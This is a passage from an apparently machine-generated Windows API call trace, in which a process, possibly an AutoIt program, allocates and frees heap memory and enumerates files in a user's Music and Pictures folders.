nFileSizeLow=0x1565c, dwReserved0=0x1, dwReserved1=0x1c, cFileName="RDmw5DGaT83 YD.mp3", cAlternateFileName="RDMW5D~1.MP3")) returned 0 [0247.093] FindClose (in: hFindFile=0xa86f90 | out: hFindFile=0xa86f90) returned 1 [0247.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0247.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0247.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0247.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0247.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0247.094] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0247.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0247.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0247.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0247.094] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0247.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0247.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0247.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0247.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0247.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0247.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0247.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0247.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0247.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0247.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0247.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0247.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0247.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0247.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0247.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0247.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0247.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0247.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0247.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0247.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0247.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0247.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x52) returned 0x2e58910 [0247.095] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RDmw5DGaT83 YD.mp3", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\RDmw5DGaT83 YD.mp3", lpFilePart=0x8cf650*="RDmw5DGaT83 YD.mp3") returned 0x28 [0247.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0247.095] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RDmw5DGaT83 YD.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rdmw5dgat83 yd.mp3")) returned 0xffffffff [0247.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0247.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0247.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0247.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0247.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0247.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0247.095] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0247.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0247.095] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0247.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0247.095] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0247.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0247.095] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0247.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0247.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56028 [0247.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0247.095] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0247.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56028 | out: hHeap=0x970000) returned 1 [0247.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0247.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0247.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0247.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0247.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0247.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0247.096] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3e0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0247.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0247.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0247.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0247.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0247.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0247.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0247.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0247.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0247.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0247.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0247.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0247.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0247.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0247.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0247.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0247.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0247.097] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0247.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0247.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0247.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0247.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0247.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0247.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0247.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0247.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0247.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0247.097] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0247.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0247.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0247.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0247.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0247.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0247.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9) returned 0x2e50ef0 [0247.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x2e50ef0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/]+\\z", lpUsedDefaultChar=0x0) returned 9 [0247.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Pictures", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0247.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x19) returned 0x2e547d8 [0247.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Pictures", cchWideChar=25, lpMultiByteStr=0x2e547d8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\FD1HVy\\Pictures", lpUsedDefaultChar=0x0) returned 25 [0247.098] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0247.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0247.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0247.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0247.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0247.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0247.098] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0247.099] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0247.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0247.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0247.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0247.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0247.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0247.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17) returned 0x2e69b08 [0247.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x2e69b08, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", lpUsedDefaultChar=0x0) returned 23 [0247.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0247.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0247.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x2e54c68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*.*", lpUsedDefaultChar=0x0) returned 4 [0247.099] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0247.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0247.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0247.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0247.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0247.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0247.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0247.100] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0247.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0247.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0247.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0247.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0247.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0247.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0247.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0247.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0247.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0247.100] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\*.*", lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe730ebd9, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe730ebd9, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x970000, dwReserved1=0x8cf2d0, cFileName=".", cAlternateFileName="")) returned 0xa87690 [0247.100] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe730ebd9, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe730ebd9, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x970000, dwReserved1=0x8cf2d0, cFileName="..", cAlternateFileName="")) returned 1 [0247.100] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76cde0e0, ftCreationTime.dwHighDateTime=0x1d5ee61, ftLastAccessTime.dwLowDateTime=0x92196850, ftLastAccessTime.dwHighDateTime=0x1d5ede5, ftLastWriteTime.dwLowDateTime=0x92196850, ftLastWriteTime.dwHighDateTime=0x1d5ede5, nFileSizeHigh=0x0, nFileSizeLow=0x17863, dwReserved0=0x970000, dwReserved1=0x8cf2d0, cFileName="abBnrhJwU.gif", cAlternateFileName="ABBNRH~1.GIF")) returned 1 [0247.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0247.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e547d8 [0247.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0247.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0247.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0247.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0247.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0247.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0247.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0247.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0247.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0247.101] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0247.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0247.101] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0247.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0247.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0247.101] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0247.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0247.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0247.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0247.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0247.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0247.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0247.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0247.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0247.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0247.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0247.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0247.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0247.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0247.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0247.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0247.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0247.102] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0247.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0247.102] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0247.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0247.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0247.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0247.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0247.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0247.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0247.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0247.102] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0247.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0247.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0247.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0247.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0247.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0247.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0247.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0247.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0247.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0247.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0247.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0247.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0247.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0247.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0247.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0247.103] PeekMessageW (in: 